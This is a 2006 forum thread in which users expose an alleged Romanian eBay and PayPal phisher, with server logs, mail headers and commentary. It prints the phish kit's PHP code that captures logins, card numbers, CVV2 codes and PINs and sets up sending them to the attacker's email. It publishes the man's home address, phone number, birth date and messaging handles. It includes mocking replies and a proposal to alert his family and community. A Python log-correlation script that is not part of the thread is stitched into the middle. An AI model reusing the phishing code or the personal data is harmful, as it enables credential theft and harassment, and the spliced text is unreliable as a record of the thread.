 MGD Premium,MVM join:2002-07-31 Fort Lauderdale, FL
| Ebay Phisher, Meet and Greet !!
On August 28 nwrickert submitted an Ebay phish 3782 to phishtrack
3782 Ebay Phish Mail »/phishtrack?pi···2&urls=1
This Ebay phish was operating from a hijacked Win 2003 server at IP 217.218.131.201 in Tehran, Iran.
During the process of removing the phish site some evidence was uncovered that led to the culprit. The Hijacking and set up of the phish took place from IP 89.136.119.91 registered to Astral Telecom in Romania. Coincidentally, that is the same IP that the phish Ebay spam originated from, see headers phishtrack submit: »/phishtrack?pi···&parts=1
quote:
Return-Path: xx(email)xx
Received: from 192.168.1.4 ([89.136.119.91]) by mp.cs.niu.edu (8.13.8/8.13.8) with SMTP id k7S9SlZB027596 for xx(email)xx Mon, 28 Aug 2006 04:28:53 -0500 (CDT)
Received: from 222.0.83.4 by ; Mon, 28 Aug 2006 07:23:38 -0300
Message-ID: xx(email)xx
From: "eBay" xx(email)xx
Reply-To: "eBay" xx(email)xx
To: xx(email)xx
Cc: xx(email)xx xx(email)xx xx(email)xx
Say "Hi" to the Romanian Ebay phisher Mr. Borcila Andra, known to his friends as "Andra"
 Romo criminal Borcila Andra Here Borcila is taking a time out from the national occupation of scanning networks, hijacking computers, and hosting phishing sites to steal your financial data.
Romo criminal "Andra" And a jovial Borcila accepting the village crown wreath for winning the weekly most identities stolen contest.
More on "Andra" in a moment, first let's have a look at his behind the phish scenes handy work. Borcila had a script on the Ebay phish that captured the victim's User Id and Password and emailed them to romanianpsycho@gmail.com:
if ($_SERVER['REQUEST_METHOD'] == 'POST') {
    $userid = $_POST['userid'];
    $pass = $_POST['pass'];
} else {
    $userid = $_GET['userid'];
    $pass = $_GET['pass'];
}

$myemail = "romanianpsycho@gmail.com";
$subject = "eBay";
$ipa = getenv('REMOTE_ADDR');
$dta = date("j.m.Y, G:ia", strtotime("+3 hours"));
$message = " User: $userid Parola: $pass ------------------------------- ";
if($UserIDgol != $userid || $passgol != $pass) {
    $fp=fopen("REDACTED", "a+");
    fputs ($fp,$message."\n");
    fclose($fp);
    header("Location:https://signin.ebay.com/ws/eBayISAPI.dll?SignIn&pUserId=&co_partnerId=2&siteid=0&pageType=222&pa1=&i1=-1&UsingSSL=1&bshowgif=0&favoritenav=&ru=http%3A%2F%2Fcontact.ebay.com%3A80%2Fws%2FeBayISAPI.dll%3FReturnUserEmail%26contactsubmit%3DContact%2BMember%26MfcISAPICommand%3DReturnUserEmail%26frm%3D279%26iid%3D-1%26requested%3Dcaptainsimos%26redirect%3D0%26de%3Doff&pp=&errmsg=8
Besides the Ebay phish, Mr Andra was working on a Paypal phish on the same Iranian server; his work in progress included:
$file = fopen("REDACTED", "a");
$ip = getenv("REMOTE_ADDR");
$adddate=date("D M d, Y g:i a");
fputs ($file, "$adddate\r\n");
fputs ($file, "Login: $login\r\n");
fputs ($file, "Password: $password\r\n");
fputs ($file, "CC Number: $lol\r\n");
fputs ($file, "MONTH: $adi1\r\n");
fputs ($file, "YEAR: $adi2\r\n");
fputs ($file, "CVV2: $adi3\r\n");
fputs ($file, "PIN: $patru\r\n");
fputs ($file, "$ip\r\n");
fputs ($file, "-----------------------------------\r\n");
fclose ($file);
$ip = getenv("REMOTE_ADDR");
Borcila also had a failed attempt at sending 100,000 Ebay phish spams from that same location:
quote: ebay phish
emails sent
Total sent : 2828 Total NOT sent : 98833 Bad addresses : 2066 Connection errors: 5425
Mailing aborted at: 8/18/2006, 4:21:22 AM
Mr. Andra is already a career criminal and is not shy about listing his occupation as "Crime" and his interests as "Fraud":
 Borcila's Resume
Besides the romanianpsycho@gmail.com address Borcila can also be reached at romanianpsycho@hotmail.com, or by AIM: Pantherkut, ICQ 194035514, or by Yahoo messenger: redbloodedeye.
Borcila lists his address as: Toparceanu nr. 6, Braila, Romania, and a telephone number of +40 (239) 620467. Andra's DOB is 01/23/1986.
 Borcila "About Me"
MGD
Acknowledgement: scott1527 and amysheehan contributed research to this story. |
|
 MGD Premium,MVM join:2002-07-31 Fort Lauderdale, FL
| Since this story came to light, "Andra" has been busy over the past 24 hours !!
It now appears that after this posting the Romanian criminal Mr. Borcila Andra may be a little shy about his full time occupation of criminal phishing and credit card and identity fraud.
Apparently Andra has discontinued two email accounts in the past 24 hours namely: romanianpsycho@gmail.com and romanianpsycho@hotmail.com.
In addition, though Borcila Andra has now bravely changed his ICQ Nickname from "Andra" to "Come and get me": »www.icq.com/people/full_details_···94035514 his actions do not match his rhetoric. While making the nickname change he has also altered his profile and tried to hide his real identity.
Note the "Before" and "After":

Andra has been systematically engaged in scanning net blocks and hijacking computers to use for multiple Ebay, Paypal, etc phishing sites. He engages in criminal fraud by using the collected credit cards and user IDs and Passwords.
Andra's self proclaimed occupation and interests listed here: »www.thefreewebhosting.com/profil···71132bac have been confirmed as accurate.
The challenge of "come and get me" should be turned over and reported to "contact[]efrauda.ro" »www.efrauda.ro/efrauda/admin/def···0&lang=2 and »https://www.efrauda.ro/efrauda_secure/ad···1&lang=2
That being said, I will agree however, that Mr. Borcila Andra is not in any danger of winning the "Smartest Criminal of the year" award !.
MGD |
|
 scott1527 Premium join:2003-01-19 | reply to MGD that sounds like a challenge mgd.
warp factor 2 engaged. starship enterprise has moved up a gear.. |
|
  pcdebb RIP dadkins Premium join:2000-12-03 Tampa, FL clubs:  | reply to MGD brilliant!!  |
|
  UncleScooter I once was SatManWorkin Premium join:2002-04-15 Tallahassee, FL | reply to MGD Well MGD looks like you scared the nads off him too, he went and got himself a sex change to boot!!!!!! |
|
  nwrickert sand groper Premium,MVM join:2004-09-04 Geneva, IL | reply to MGD Wow! Nice work.
The rate of new incoming phish email has been very low for the last couple of days. Maybe you disrupted something. |
|
  user4275 Location, Location, Location Premium join:2003-11-27 Chicago, IL clubs:
·AT&T U-Verse
| said by nwrickert :The rate of new incoming phish email has been very low for the last couple of days. Maybe you disrupted something. Well yes, Mr. Andra was busy moving from Romania to the US, as his new residency info suggests.  |
|
 scott1527 Premium join:2003-01-19 | reply to MGD he maybe did the scams to get a sex change? |
|
  Doctor Olds I Need A Remedy For What's Ailing Me. Premium,VIP join:2001-04-19 1970 442 W30 clubs:
| reply to MGD said by MGD :Since this story came to light, "Andra" has been busy over the past 24 hours !! It now appears that after this posting the Romanian criminal Mr. Borcila Andra may be a little shy about his full time occupation of criminal phishing and credit card and identity fraud. I will agree however, that Mr. Borcila Andra is not in any danger of winning the "Smartest Criminal of the year" award !. That's too damn funny. Excellent!! Scared the male out of him and she lost her jewels.....
Keep up the Great Work!!! -- Whats the point of owning a supercar if you cant scare yourself stupid from time to time? |
|
  simpfan742 People Call Me Andrew. Premium join:2003-05-18 Belmar, NJ | reply to MGD Beautiful work! I really enjoyed reading this. Funny, too. -- My Gallery |
|
 garys_2k
join:2004-05-07 Farmington, MI | reply to MGD Awesome work! Let's hope he spends some time in prison. |
|
 MGD Premium,MVM join:2002-07-31 Fort Lauderdale, FL
| reply to MGD A few more snippets of logs from Mr "come and get me" Alba's hacking work on the phish hosting machine in Iran. It appears that he first made a home there over two weeks ago:
89.136.119.91 - - [16/Aug/2006:23:03:02 +0330] "GET / HTTP/1.1" 406 2690
89.136.119.91 - - [16/Aug/2006:23:03:12 +0330] "GET /index.html.cz HTTP/1.1" 200 1634
89.136.119.91 - - [16/Aug/2006:23:03:13 +0330] "GET /apache_pb.gif HTTP/1.1" 200 2326
89.136.119.91 - - [16/Aug/2006:23:03:15 +0330] "GET / HTTP/1.1" 406 2690
89.136.119.91 - - [16/Aug/2006:23:15:25 +0330] "GET /index.php HTTP/1.1" 200 22
89.136.119.91 - - [16/Aug/2006:23:42:09 +0330] "GET /index.php HTTP/1.1" 200 22
89.136.119.91 - - [16/Aug/2006:23:45:56 +0330] "GET / HTTP/1.1" 200 16
89.136.119.91 - - [16/Aug/2006:23:46:01 +0330] "GET / HTTP/1.1" 200 16
89.136.119.91 - - [16/Aug/2006:23:54:40 +0330] "GET / HTTP/1.1" 200 536
89.136.119.91 - - [16/Aug/2006:23:54:43 +0330] "GET /sysdll.php HTTP/1.1" 200 7539
89.136.119.91 - - [16/Aug/2006:23:54:44 +0330] "GET /sline.gif HTTP/1.1" 404 281
89.136.119.91 - - [16/Aug/2006:23:54:45 +0330] "GET /pdown.gif HTTP/1.1" 404 281
89.136.119.91 - - [16/Aug/2006:23:54:45 +0330] "GET /login.php HTTP/1.1" 200 13382
89.136.119.91 - - [16/Aug/2006:23:54:45 +0330] "GET /go1.gif HTTP/1.1" 404 279
89.136.119.91 - - [16/Aug/2006:23:54:46 +0330] "GET /hide.htm HTTP/1.1" 404 280
89.136.119.91 - - [16/Aug/2006:23:54:46 +0330] "GET /addr.gif HTTP/1.1" 404 280
89.136.119.91 - - [16/Aug/2006:23:54:46 +0330] "GET /ress.gif HTTP/1.1" 404 280
89.136.119.91 - - [16/Aug/2006:23:54:46 +0330] "GET /ie2.gif HTTP/1.1" 404 279
89.136.119.91 - - [16/Aug/2006:23:54:47 +0330] "GET /logoEbay_150x40.gif HTTP/1.1" 200 954
89.136.119.91 - - [16/Aug/2006:23:54:47 +0330] "GET /or_60x23.gif HTTP/1.1" 200 261
89.136.119.91 - - [16/Aug/2006:23:54:48 +0330] "GET /logoVeriSign_100x65.gif HTTP/1.1" 200 1835
89.136.119.91 - - [16/Aug/2006:23:54:49 +0330] "GET /pdownclick.gif HTTP/1.1" 404 286
89.136.119.91 - - [16/Aug/2006:23:54:55 +0330] "POST /contact.php HTTP/1.1" 302 14753
89.136.119.91 - - [16/Aug/2006:23:56:47 +0330] "GET / HTTP/1.1" 304 -
Also a sample from the error logs:
[Wed Aug 16 23:00:15 2006] [crit] (2)No such file or directory: make_sock: could not bind to port 80
[Wed Aug 16 23:03:02 2006] [error] [client 89.136.119.91] no acceptable variant: d:/mssql/binn/lol/apache/htdocs/index.html
[Wed Aug 16 23:03:15 2006] [error] [client 89.136.119.91] no acceptable variant: d:/mssql/binn/lol/apache/htdocs/index.html
[Wed Aug 16 23:54:44 2006] [error] [client 89.136.119.91] File does not exist: d:/mssql/binn/lol/apache/htdocs/sline.gif
[Wed Aug 16 23:54:45 2006] [error] [client 89.136.119.91] File does not exist: d:/mssql/binn/lol/apache/htdocs/pdown.gif
[Wed Aug 16 23:54:45 2006] [error] [client 89.136.119.91] File does not exist: d:/mssql/binn/lol/apache/htdocs/go1.gif
[Wed Aug 16 23:54:46 2006] [error] [client 89.136.119.91] File does not exist: d:/mssql/binn/lol/apache/htdocs/hide.htm
[Wed Aug 16 23:54:46 2006] [error] [client 89.136.119.91] File does not exist: d:/mssql/binn/lol/apache/htdocs/addr.gif
[Wed Aug 16 23:54:46 2006] [error] [client 89.136.119.91] File does not exist: d:/mssql/binn/lol/apache/htdocs/ress.gif
[Wed Aug 16 23:54:46 2006] [error] [client 89.136.119.91] File does not exist: d:/mssql/binn/lol/apache/htdocs/ie2.gif
[Wed Aug 16 23:54:49 2006] [error] [client 89.136.119.91] File does not exist: d:/mssql/binn/lol/apache/htdocs/pdownclick.gif
[Wed Aug 16 23:56:52 2006] [error] [client 89.136.119.91] File does not exist: d:/mssql/binn/lol/apache/htdocs/hide.htm
[Wed Aug 16 23:56:53 2006] [error] [client 89.136.119.91] File does not exist: d:/mssql/binn/lol/apache/htdocs/pdownclick.gif
Of course no criminal fraudster, even one at Mr "come and get me" Alba's two digit IQ level, would fail to test their phish to make sure that the victim's user id, password and card data were being collected:
quote:
-----------------------------------
Thu Aug 31, 2006 4:30 pm
Login: uasuags@yahoo.com
Password: peleu
CC Number: 4111111111111111
MONTH: 03
YEAR: 2009
CVV2: 123
PIN: 1234
89.136.119.91
-----------------------------------
Fri Sep 01, 2006 10:14 am
Login: ddfdf@ajdfhdhksj.com
Password: asdfsdfsd
CC Number: 4111111111111111
MONTH: 01
YEAR: 2006
CVV2: 123
PIN: 0650
89.136.119.91
-----------------------------------
Sat Sep 02, 2006 3:56 pm
Login: asugasguag@Yahoo.co
Password: mnihiashaihs
CC Number: 4111111111111111
MONTH: 02
YEAR: 2008
CVV2: 111
PIN: 0000
172.158.63.45
-----------------------------------
Sat Sep 02, 2006 10:30 pm
Login: test@test.com
Password: test
CC Number: 4111111111111111
MONTH: 01
YEAR: 2006
CVV2: 000
PIN: 4321
89.136.119.91
-----------------------------------
Except for the one test from an AOL IP, "Alba" performed the complete operation from IP 89.136.119.91. He hacked into the server, set up both an Ebay and PayPal phish, and made several attempts to complete a 100,000 phish spam mailing, all from the comfort of his Romanian IP.
He posts his criminal resume online, posts pictures of himself, posts his Date of Birth, full address, telephone number, his email address, AIM, Yahoo IM, and ICQ info. When "outed", with the huevos of a bull and the brain of a flea he says "Come and get me". However, after taking stock of his current situation he promptly changes his gender and begins his disguise.
Having any second thoughts there... Mr Miss "come and get me" Borcila Alba ???
MGD |
|
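As an added defender-side example (not code from the thread or from any of the posters), here is the attribution step MGD performed by hand, done mechanically: the MTA-observed peer address from the Received: header quoted in the first post is matched against client IPs in the Apache access log quoted in this post. The header and log lines below are constructed from the values quoted in the thread (the 172.158.63.45 line stands in for the single AOL test entry) and are not the full original logs.

```python
import re
from datetime import datetime

# Constructed samples modelled on the evidence quoted in this thread. The two IPs
# (89.136.119.91, 172.158.63.45) and the paths come from the posts; the lines are
# abbreviated re-typings, not the full original logs.
RECEIVED_HEADER = (
    "Received: from 192.168.1.4 ([89.136.119.91]) "
    "by mp.cs.niu.edu (8.13.8/8.13.8) with SMTP id k7S9SlZB027596")
ACCESS_LOG = """\
89.136.119.91 - - [16/Aug/2006:23:03:02 +0330] "GET / HTTP/1.1" 406 2690
89.136.119.91 - - [16/Aug/2006:23:54:43 +0330] "GET /sysdll.php HTTP/1.1" 200 7539
89.136.119.91 - - [16/Aug/2006:23:54:45 +0330] "GET /login.php HTTP/1.1" 200 13382
89.136.119.91 - - [16/Aug/2006:23:54:55 +0330] "POST /contact.php HTTP/1.1" 302 14753
172.158.63.45 - - [02/Sep/2006:15:56:10 +0330] "POST /contact.php HTTP/1.1" 302 14753
"""

# In a Received: line the bracketed address is the peer the receiving MTA actually
# spoke to; the name before it (192.168.1.4 here) is only what the client claimed in HELO.
RECEIVED_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")
# Apache common log format: ip ident user [timestamp] "method path proto" status bytes
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)')

def received_peer_ips(headers):
    """Return the MTA-observed peer addresses from one or more Received: lines."""
    return RECEIVED_RE.findall(headers)

def parse_access_log(text):
    """Parse common-log-format lines into dicts; lines that do not match are skipped."""
    entries = []
    for line in text.splitlines():
        m = ACCESS_RE.match(line)
        if m:
            e = m.groupdict()
            e["ts"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
            e["status"] = int(e["status"])
            entries.append(e)
    return entries

def correlate(headers, entries):
    """For each mail-source IP that also appears in the web log: first request time and requests."""
    mail_ips = set(received_peer_ips(headers))
    hits = {}
    for e in entries:
        if e["ip"] not in mail_ips:
            continue
        h = hits.setdefault(e["ip"], {"first": e["ts"], "requests": []})
        h["first"] = min(h["first"], e["ts"])
        h["requests"].append((e["method"], e["path"], e["status"]))
    return hits
```

The AOL test address never appears in the mail headers, so it drops out of the correlation, which is exactly the separation MGD draws between the one outside test and the operator's own address.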
  Doctor Olds I Need A Remedy For What's Ailing Me. Premium,VIP join:2001-04-19 1970 442 W30 clubs:
| It's a shame there is not an International Computer Crimes Agency with Worldwide jurisdiction. She would wet her panties if the Police picked her up at her apartment and took her in shackles to be extradited that same hour to the US for trial, conviction, sentencing and immediate Prison time. Then in 10 or 20 years, send her back to Romania on a slow China boat.  -- Whats the point of owning a supercar if you cant scare yourself stupid from time to time? |
|
  kamm
join:2001-02-14 Brooklyn, NY
·T-Mobile US
| said by Doctor Olds :It's a shame there is not an International Computer Crimes Agency with Worldwide jurisdiction. I agree although it would be just as impossible to have the US to be a signee as on The Hague - we would claim with our usual pathetic hypocrisy that 'everybody is subject except Americans, sorry.' |
|
  MxxCon
join:1999-11-19 Brooklyn, NY clubs:  
| reply to MGD let's give more fame/shame to this scammer?  »digg.com/security/Meet_a_Romania···_Scammer -- [Sig removed by Administrator: Signature can not exceed 20GB] |
|
  kamm
join:2001-02-14 Brooklyn, NY
·T-Mobile US
| reply to MGD This guy is obviously a career criminal - no job, no interest in having a job and it's most likely also a satisfying "work" for him. I've immigrated from Mid-EU, I have seen guys like this all over the place around the early 90s, even I was offered huge money by gangs to help them in computer crimes (I'm an engineer too) which I always immediately refused. (As, of course, online shopping hadn't existed yet back then, offers usually meant something bigger - and crazier - 'gig'...) Now that region - now part of the EU - is well ahead of Romania, so no wonder this kind of "profession" moved into 'more secure' areas (= less police influence expected) eastward, mostly to the Balkans and Romania, Ukraine etc. |
|
  wcweaver Premium join:2002-02-22 Fort Myers, FL clubs:
·Future Nine Corpor..
·Comcast
·Embarq
| reply to MGD I passed this information to the head of the Romanian National Police at the Southeast European Cooperative Initiative, SECI Center in Bucharest, Romania. I don't know if they will do anything but who knows. Hopefully they will turn up the heat on Mr Andra.
SECI website »www.secicenter.org/ |
|
  E_V Premium join:2000-09-29 Vancouver, BC clubs:
| said by wcweaver :I passed this information to the head of the Romanian National Police at the Southeast European Cooperative Initiative, SECI Center in Bucharest, Romania. Obviously everyone's goal is to wipe out scammers, and if that happens, awesome. By turning up the heat and letting them know eyes are everywhere, watching keystrokes, tracking them relentlessly I am content knowing that in the interim where they thought they had a free ride they are now (if they have any brains at all) beginning to perspire.
After all....
August 21 2006 Romanian police arrested 23 people in the southern city of Pitesti as part of a clampdown on internet scam rings operating in the eastern European country. The arrested individuals are among a group of 63 suspects wanted for questioning over allegations they ripped off in excess of $120,000 from 120 foreign marks. FBI and US officials assisted in the investigation that culminated in the recent arrests, local police said on Saturday. If convicted, the suspects face up to 15 years imprisonment for ID theft offences. » www.theregister.co.uk/2006/08/21···ampdown/
October 28 2005 London - Three Romanian fraudsters have been jailed on Friday in London for their part in a worldwide fraud scam carried out via Internet auction house eBay, which netted at least £300 000 (about R35,7-million). » www.int.iol.co.za/index.php?set_···0793B265
May 18 2006 A group of financial fraudsters stealing money from US citizens accounts has been arrested in Moscow. The criminals were stealing money through ATMs. Spokespeople for US police addressed to the Moscow Interior Affairs Department for Struggle Against Economic Crimes several months ago. US officials said that someone was regularly stealing money from credit cards belonging to US citizens. The money, the officials said, was cashed from Moscow ATMs. They added that the credit card holders had never visited Russia before. » english.pravda.ru/hotspots/crime···t_card-0
Keep up the good fight people.  |
|
  peter_m Premium join:2005-07-13 Canada, QC | reply to kamm That doesn't stop everyone else from signing up and making it harder for these criminals. What are all the other nations doing about it? |
|
 gatzdon
join:2002-10-25 Lake Zurich, IL
| reply to MGD Notify the right people
Anyone feel like constructing a brief summary with appropriate links and sending it to all the right people in the scammer's town, like the churches, store owners, government officials, local police, local groups and organizations, etc... We may get lucky and people who personally know the scammer will find out. People that the scammer wouldn't want to know, like family. -- $100 placed at 7 percent interest compounded quarterly for 200 years will increase to more than $100,000,000 -- by which time it will be worth nothing. - Lazarus Long |
|